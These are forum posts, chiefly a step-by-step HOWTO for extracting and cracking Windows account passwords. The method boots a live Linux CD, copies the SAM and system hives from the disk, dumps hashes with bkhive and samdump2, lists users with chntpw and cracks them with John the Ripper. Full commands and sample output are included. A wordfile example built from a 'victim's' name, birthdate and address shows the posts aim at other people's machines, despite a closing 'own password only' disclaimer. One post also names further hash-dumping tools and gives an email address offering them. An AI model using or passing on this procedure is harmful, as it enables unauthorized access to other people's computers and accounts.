Dark808

Accualy this is only the old way i found of doing it. and yes you could use Cain do grab the hashes but then the compy would have to have cain installed on it. sometimes that is not desierable. This is how I would do it. I would boot up to slax. then just copy the entire sam and system file to a usb or email them. then take them to another computer and recover them using a rainbowtable. (you can get slax at http://www.slax.org/ there is a module that you put into the cd when you burn it that will give you bkhive pwdump and john so you can crack the hashes if you want them email me "lucky.very.lucky@gmail.com" but you dont need those if your just getting the hashes/SAM file then you can just take the accual SAM and security file) if you dont want to use linux. you can (i guess never tried) use Pwdump3 or 6 or 4 to get the hashes over a network. but if you want to do it to a computer not on a network. you can use a program i found called SAMinside. just take the exe and put it in your usb stick, run the exe. and copy the hashes displayed on the screen(theres more to it but i'm too lazy to type it right now) i would use rainbow tables but i have found. that everytime i try to download one it stops at like 2 gigs or somthin when left over night.

Hi all, Firstly, this is a HOWTO on getting a windows password with additional syskey-encryption. Recommended only for people who like to do things the hard and slow way. Second, you're doing this on your own behalf and don't use it wrong or visciously. Have fun (even though it is a very old way of doing it)! Step 1: Boot Knoppix S-T-D and get access to windows: Put your Knoppix S-T-D cd in your cd-rom and boot up your computer. Make sure that bios is set to boot the cd-rom. First, we need some information on the system: (press ALT+F5 to open the shell in which we will type every command in) cat /etc/fstab This will output something like this: proc /proc proc defaults 0 0 pts /dev/pts devpts mode=0622 0 0 /dev/fd0 /mnt/auto/floppy auto user,noauto,exec,umask=000 0 0 /dev/cdrom /mnt/auto/cdrom auto user,noauto,exec,ro 0 0 /dev/cdrom1 /mnt/auto/cdrom1 auto users,noauto,exec,ro 0 0 # Added by KNOPPIX /dev/hda1 /mnt/hda1 ntfs noauto,users,exec,ro,uid=knoppix,gid=knoppix 0 0 Remember that we want to get the windows logon password, so in the most cases you should look for a harddisc with the NTFS filesystem.Take a look at the output above. You will see that there is a NTFS-harddisc the: '/dev/hda1'. To get access to this drive you have to 'mount' it: mount -r /dev/hda1 /mnt/hda1 The drive 'hda1' is now located in '/mnt/hda1'. Note that you can't write to the NTFS-drive only read. Step 2: Get information needed to crack the password: Now that we have access to our selected windows-drive we need two files: the SAM and system file. They are located in %WINDIR% / system32 / config: cp /mnt/hda1/WINDOWS/system32/config/SAM SAM cp /mnt/hda1/WINDOWS/system32/config/system system The files are now copyied to your RAM (from which Knoppix S-T-D normally read/writes to). The 'SAM' file contains the security accounts information of the system's users and the 'system' hive which has the data to provide a bootkey for syskey (encryption method). The passwords in SAM is encrypted in MD5 and ontop of that with the syskey encryption, which Microsoft calls a "complex obfuscation algorithm".. Step 4: Use programs (Bkhive and Pwdump2) to obtain password hashes: The programs are now installed and ready to be used. First, we need to get the bootkey to get rid of the syskey decryption of our password hashes: bkhive system bootkey Second, we use the bootkey and SAM with samdump2 to generate our password hashes in a file: samdump2 SAM bootkey > hashes Step 5: Crack the passwords: First of all note that the process of cracking a password can take hours even days if complex and long enough. However it can be done faster, but keep in mind that it differs. Also, there is many programs to use to crack passwords and we will use 'John'. John is preinstalled on the Knoppix S-T-D and is free to use. We say that 'Test' is a user on the windows-machine and that the password is 'KANDUSE' (I tried on my own computer with these informations). Now to the cracking: /etc/john/john -user:Test hashes I got the following output: Loaded 1 password (NT LM DES [24/32 4K]) KANDUSE (Test:1) guesses: 1 time: 0:00:14:26 (3) c/s: 512664 trying: KHERCUL - KNDRROL It took 14 minutes and 26 seconds to crack it on my computer, but it could just as well have lasted 3 minutes or 2 hours or more. Note that if there is more than one user on the computer you can as well exclude the '-user:Test' part if you want John to crack every password at once. If you have some words that you would like it to check for first, we can use a 'wordfile'. A wordfile contains words to search for. Example of wordfile: victimsname victimsbirthdate victimsaddress ... etc. You only put one word on each line and you can set as many as you would like to. Now we want to use the wordfile so we simply put in the parameter "-wordfile:filename". Like this: /etc/john/john -wordfile:my_file password_file This will speed up the process if you have some good ideas of what the password could be. If you missed what the cracked password was you can use this command to request it: /etc/john/john -show password_file This will show something like this (I filtered it a bit): [Username]:[Password]:(additional information here) x password cracked, x left It is also good to know that if john cracks a password longer than 8 chararacters it will break it into two parts. Like this: Loaded x password (NT LM DES [24/32 4K]) 12345678 (Test:1) 9 (Test:2) guesses: x time: x:xx:xx:xx (x) c/s:xxxx trying: xxxxx - xxxxx If you don't know the user names for the computer (and in the most cases you probrably don't) you can make 'chntpw' list them for you: chntpw -l SAM This will generate something like this: chntpw version 0.99.1 030126, (c) Petter N Hagen Hive's name (from header): <SystemRootSystem32ConfigSAM> ROOT KEY at offset: 0x001020 Page at 0x9000 is not 'hbin', assuming file contains garbage at end File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage) Used for data: 337/29520 blocks/bytes, unused: 11/2992 blocks/bytes. Hello, this is SAM! Failed logins before lockout is: 0 Minimum password length : 0 Password history count : 0 RID: 01f4, Username: <Administrator> RID: 03f4, Username: <Test> Hives that have changed: # Name None! Above we used the user 'Test' and is located here in the output: RID: 03f4, Username: <Test> To show that a password cracking could take less time, we try setting a password on your Knoppix S-T-D to crack. Type: passwd knoppix The system now requests a password, type 1234. Then retype when asked. Now we need to dump it to a file so it can be cracked and use John to do it: /etc/john/unshadow /etc/passwd /etc/shadow > crack.this /etc/john/john crack.this This should not take that long because it is a very easy password to crack. You will see an output much like this: Loaded 1 password (Standard DES [24/32 4K]) 1234 (knoppix) guesses: 1 time: 0:00:00:00 100% (2) c/s: 3024 trying: 12345 - robert This is an approach on how to retrieve a password for windows. I hope someone will find this easy enough to understand and helpful. Remember!! Only use this if you i.e loose your own password or if you need to help your friend.[/code][/url]